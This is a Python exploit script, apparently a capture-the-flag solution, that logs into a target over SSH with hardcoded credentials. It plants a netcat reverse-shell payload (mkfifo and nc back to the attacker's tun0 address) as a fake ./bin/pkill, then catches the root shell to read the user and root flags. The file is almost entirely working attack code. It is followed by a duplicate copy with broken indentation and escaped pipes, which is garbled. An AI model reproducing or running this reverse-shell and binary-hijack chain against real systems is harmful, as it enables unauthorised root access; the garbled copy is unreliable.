heapbytes/pwn.py

## pwn.py
import requests
import sys
import subprocess
import paramiko
import os
import time
from pwn import *

#import socket
#from termcolor import colored
#import netifaces as ni

def my():
    my.ip = os.popen("ip -4 addr show tun0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'").read().strip()
    my.port = 4442


def stable(ip, user, passwd):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(ip, username=user, password=passwd)

    print('[*] Stabalizing Shell')
    payload = f'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {my.ip} {my.port} >/tmp/f'

    command = f'echo "{payload}" > ./bin/pkill && chmod +x ./bin/pkill && cat user.txt'

    (stdin, stdout, stderr) = ssh.exec_command(command)
    try:
        if(stdin, stdout, stderr):
            uflag = stdout.read().decode('ascii').strip("\n")
            print('[*]Gettign User flag')
            print('\n', "\033[48;5;236m\033[38;5;231mUser \033[38;5;208mFlag: \033[0;0m", uflag)

            print('\n[*]Getting root flag')
            shell()
    except Exception as e:
        print(e)


def shell():

    with process(['nc', '-nvlp', f'{my.port}']) as p:
        p.recv(1024)
        p.sendline(b'cat root.txt')
        rflag = p.recv().decode()
        print('\n', "\033[48;5;236m\033[38;5;231mRoot \033[38;5;208mFlag: \033[0;0m", rflag)

        #p.interactive()
        #uncomment the previous line for spawning root shell

        p.close()

if __name__ == '__main__':
    my()
    print(f'[*] Starting exploit on {sys.argv[1]} \n')
    stable(sys.argv[1], 'lachlan', 'thisistheway123')
	import requests
	import sys
	import subprocess
	import paramiko
	import os
	import time
	from pwn import *

	#import socket
	#from termcolor import colored
	#import netifaces as ni

	def my():
	my.ip = os.popen("ip -4 addr show tun0 \| grep -oP '(?<=inet\s)\d+(\.\d+){3}'").read().strip()
	my.port = 4442


	def stable(ip, user, passwd):
	ssh = paramiko.SSHClient()
	ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
	ssh.connect(ip, username=user, password=passwd)

	print('[*] Stabalizing Shell')
	payload = f'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|sh -i 2>&1\|nc {my.ip} {my.port} >/tmp/f'

	command = f'echo "{payload}" > ./bin/pkill && chmod +x ./bin/pkill && cat user.txt'

	(stdin, stdout, stderr) = ssh.exec_command(command)
	try:
	if(stdin, stdout, stderr):
	uflag = stdout.read().decode('ascii').strip("\n")
	print('[*]Gettign User flag')
	print('\n', "\033[48;5;236m\033[38;5;231mUser \033[38;5;208mFlag: \033[0;0m", uflag)

	print('\n[*]Getting root flag')
	shell()
	except Exception as e:
	print(e)


	def shell():

	with process(['nc', '-nvlp', f'{my.port}']) as p:
	p.recv(1024)
	p.sendline(b'cat root.txt')
	rflag = p.recv().decode()
	print('\n', "\033[48;5;236m\033[38;5;231mRoot \033[38;5;208mFlag: \033[0;0m", rflag)

	#p.interactive()
	#uncomment the previous line for spawning root shell

	p.close()

	if __name__ == '__main__':
	my()
	print(f'[*] Starting exploit on {sys.argv[1]} \n')
	stable(sys.argv[1], 'lachlan', 'thisistheway123')